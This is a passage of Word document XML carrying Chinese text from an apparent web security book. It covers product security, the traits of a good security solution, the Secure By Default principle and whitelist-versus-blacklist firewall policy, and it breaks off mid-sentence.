        <w:t>很多人认为，安全和业务是冲突的，因为往往为了安全，要牺牲业务的一些易用性或者性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>能，笔者不太赞同这种观点。从产品的角度来说，安全也应该是产品的一种属性。一个从未考虑过安全的产品，至少是不完整的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="154"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>比如，我们要评价一个杯子是否好用，除了它能装水，能装多少水外，还要思考这个杯子</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="180"/>
      </w:pPr>
      <w:bookmarkStart w:name="1.7  白帽子兵法" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>内壁的材料是否会溶解在水里，是否会有毒，在高温时会不会熔化，在低温时是否易碎，这些问题都直接影响用户使用杯子的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>对于互联网来说，安全是要为产品的发展与成长保驾护航的。我们不能使用“粗暴”的安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>全方案去阻碍产品的正常发展，所以应该形成这样一种观点：没有不安全的业务，只有不安全的实现方式。产品需求，尤其是商业需求，是用户真正想要的东西，是业务的意义所在，在设计安全方案时应该尽可能地不要改变商业需求的初衷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>作为安全工程师，要想的就是如何通过简单而有效的方案，解决遇到的安全问题。安全方案必须能够有效抵抗威胁，但同时不能过多干涉正常的业务流程，在性能上也不能拖后腿。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>好的安全方案对用户应该是透明的，尽可能地不要改变用户的使用习惯。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>微软在推出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Vista </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>时，有一个新增的功能叫 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>UAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>，每当系统里的软件有什么敏感</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>动作时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>UAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>就会弹出来询问用户是否允许该行为。这个功能在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Vista </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>众多失败的原因中是被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>人诟病最多的一个。如果用户能够分辨什么样的行为是安全的，那么还要安全软件做什么？同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>样的问题出现在很多主动防御的桌面安全保护软件中，它们动辄弹出个对话框询问用户是否允许目标的行为，这是非常荒谬的用户体验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="142"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>好的安全产品或模块除了要兼顾用户体验外，还要易于持续改进。一个好的安全模块，同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>时也应该是一个优秀的程序，从设计上也需要做到高聚合、低耦合、易于扩展。比如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的用户就可以自己根据需要写插件，实现一些更为复杂的功能，满足个性化需求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>最终，一个优秀的安全方案应该具备以下特点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings"/>
          <w:color w:val="818181"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>能够有效解决问题；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings"/>
          <w:color w:val="818181"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>用户体验好；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings"/>
          <w:color w:val="818181"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>高性能；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings"/>
          <w:color w:val="818181"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>低耦合；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings"/>
          <w:color w:val="818181"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>易于扩展与升级。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>关于产品安全性的问题，在本书的“互联网业务安全”一章中还会继续深入阐述。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250005" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>白帽子兵法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="292"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>在上节讲述了实施安全评估的基本过程，安全评估最后的产出物就是安全方案，但在具体设计安全方案时有什么样的技巧呢？本节将讲述在实战中可能用到的方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1055" w:val="left" w:leader="none"/>
          <w:tab w:pos="1056" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="116" w:after="0"/>
        <w:ind w:left="1055" w:right="0" w:hanging="852"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250004" w:id="40"/>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:bookmarkStart w:name="1.7.1  Secure By Default原则" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>ec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>ure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>By</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>Default</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t> 原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="210"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>在设计安全方案时，最基本也最重要的原则就是“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>”。在做任何安全设计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>时，都要牢牢记住这个原则。一个方案设计得是否足够安全，与有没有应用这个原则有很大的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>关系。实际上，“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>lt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>”原则，也可以归纳为白名单、黑名单的思想。如果更多地</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>使用白名单，那么系统就会变得更安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1098" w:val="left" w:leader="none"/>
          <w:tab w:pos="1099" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="126" w:after="0"/>
        <w:ind w:left="1098" w:right="0" w:hanging="895"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>黑名单、白名单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="221" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>比如，在制定防火墙的网络访问控制策略时，如果网站只提供 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>服务，那么正确的做法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>是只允许网站服务器的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>80 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>443 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>端口对外提供服务，屏蔽除此之外的其他端口。这是一种“白</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>名单”的做法；如果使用“黑名单”，则可能会出现问题。假设黑名单的策略是：不允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>端口对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Internet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>开放，那么就要审计 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的默认端口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>22 </w:t>
      </w:r>
